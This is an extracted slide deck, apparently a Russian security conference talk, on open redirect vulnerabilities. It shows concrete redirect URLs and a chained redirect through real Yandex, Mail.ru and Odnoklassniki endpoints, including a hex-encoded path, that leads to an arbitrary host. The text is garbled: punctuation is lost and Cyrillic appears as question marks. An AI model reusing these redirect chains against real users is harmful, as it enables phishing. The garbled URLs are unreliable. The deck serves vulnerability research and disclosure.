Open Redirects

1
?? ???? ????? ??????????
2
about me

• anonimous_at_localhost whoami
• BigBear
• anonimous_at_localhost id
• uid1020(pentest) gid100(antichat)
  groups101(rdot)
• _at_i_BigBear

3
Open Redirects

• OWASP Description
• An open redirect is an application that takes a
  parameter and redirects a user to the parameter
  value without any validation.
• This vulnerability is used in phishing attacks to
  get users to visit malicious sites without
  realizing it.

4
Open Redirects
5
Open Redirects
6
Open Redirects
Client
Server 1
1.php?redirhttp//server2
header("Location http//server2/")
Server 2
7
Open Redirects
Client
Server 1
1.php?redirhttp//anyhost
header("Location http//anyhost/")
Server 2
8
Open Redirects
9
Open Redirects
_at_Black2Fan
10
Open Redirects
Client
Server 1
1.php?redirhttp//server2
header("Location http//server2/")
Server 2
any host
header("Location http//anyhost/")
11
Open Redirects
http//yandex.ru/clck/jsredir?fromyandex.ru3Byan
dsearch3Bweb3B3Btextetext635.A3K9EhGzrzdN
http//yabs.yandex.ru/count/RhnEbYFY6Pm4000 http
//awaps.yandex.net/1/c1/tx21lszVf7wve-k2Rifa_A_.sw
fclick_num0 http//an.yandex.ru/count/asfa3573v
svsTTvssb9dYYe
12
Open Redirects
13
Open Redirects
https//mail.yandex.ru/ ?retpathhttps//mail.yand
ex.ru/neo2/inbox
https//mail.yandex.ru/ ?retpathhttps//google.co
m
14
Open Redirects
https//mail.yandex.ru/ ?retpathhttps//an.yandex
.ru/count/JcnAPGOmkJy40000Zh_yYqi5XPvP5vK1cm5kGxS2
98Yuvo_10OczVX8D0fYihxs-dWQThty64fQpheHU0Rhm6mcCwD
vLyGMc6ugmgHN00Rs_yYMp0Qe1fQc4nmEyg9iX0v6rhcBQ1u
15
Open Redirects
Why ???
16
Open Redirects
https//auth.mail.ru/cgi-bin/auth?FakeAuthPagePa
gehttp//deti.mail.ru/
https//auth.mail.ru/cgi-bin/auth?FakeAuthPagePa
gehttp// google.com/
17
Open Redirects
?????????????? -)
Step 1 ???? ?????????
Step 2 ???? ????????? ?? ???
18
Open Redirects
?????????????? -)
http//ok.ru/dk?cmdlogExternalst.cmdlogExternal
st.name62670701063111st.linkhttp//www.yandex.
ru/
19
Open Redirects
?????????????? -)
http//odnoklassniki.mail.ru
Step 3 ?????????
https//auth.mail.ru/cgi-bin/auth?FakeAuthPagePa
gehttp//odnoklassniki.mail.ru/
20
Open Redirects
?pagehttp//odnoklassniki3Fmany-many-params
auth.mail.ru
Client
header("Location http//odnoklassniki3Fmany-many
-params/")
Odnoklassniki.ru
any host
header("Location http//anyhost/")
21
Open Redirects
https//auth.mail.ru/cgi-bin/auth?FakeAuthPagePa
gehttp// odnoklassniki.mail.ru/dk?cmd
logExternalst.cmdlogExternalst.name62670701063
111 st. linkhttp//www.yandex.ru/
22
Open Redirects
https//auth.mail.ru/cgi-bin/auth?FakeAuthPagePa
gehttp// odnoklassniki.mail.ru/dk?cmd
logExternalst.cmdlogExternalst.name62670701063
111st.linkhttp//anyhost/
23
Open Redirects
24
Open Redirects
https//auth.mail.ru/cgi-bin/auth?FakeAuthPagePa
gehttp// odnoklassniki.mail.ru/dk?cmd
logExternalst.cmdlogExternalst.name62670701063
111 st. linkhttp//www.yandex.ru/
https//auth.mail.ru/cgi-bin/auth?FakeAuthPagePa
gehttp// odnoklassniki.mail.ru/dk?cmd
logExternalst.cmdlogExternalst.name62670701063
111 st. linkhttp//any.yandex.ru/
25
Open Redirects
https//auth.mail.ru/cgi-bin/auth?FakeAuthPagePa
gehttp// odnoklassniki.mail.ru/dk?cmd
logExternalst.cmdlogExternalst.name62670701063
111st. linkhttp// an.yandex.ru/count/JcnAPGOmkJ
y40000Zh_yYqi5XPvP5vK1cm5kGxS298Yuvo_10OczVX8D0fYi
hxs-dWQThty64fQpheHU0Rhm6mcCwDvLyGMc6ugmgHN00Rs_yY
Mp0Qe1fQc4nmEyg9iX0v6rhcBQ1u--x8jD1v-uiY4R3fE539bY
GeoGdoIWaDGmhv2V9AUEcQYmG5bp1wJ00000J0MkyUW8iyWCm0
m5iB2-9f03iG6oYbEvhty64hl-rfaBeJVud071__________yF
VnO0
26
Open Redirects
https//auth.mail.ru/cgi-bin/auth?FakeAuthPagePa
gehttp// odnoklassniki.mail.ru/dk?cmd
logExternalst.cmdlogExternalst.name62670701063
111st. linkhttp // an.yandex.ru2f636f756e
742f4a636e4150474f6d6b7957436d306d
356942322d396630336947366f5962457
66874793634686c2d72666142654a5675
643037315f5f5f5f5f5f5f5f5f5f794656
6e4f30
27
Open Redirects
?????????????? -)
Client
odnoklassniki.mail.ru
auth.mail.ru
ok.ru
an.yandex.ru
anyhost
28
??????? ?? ???????? ! _at_i_BigBear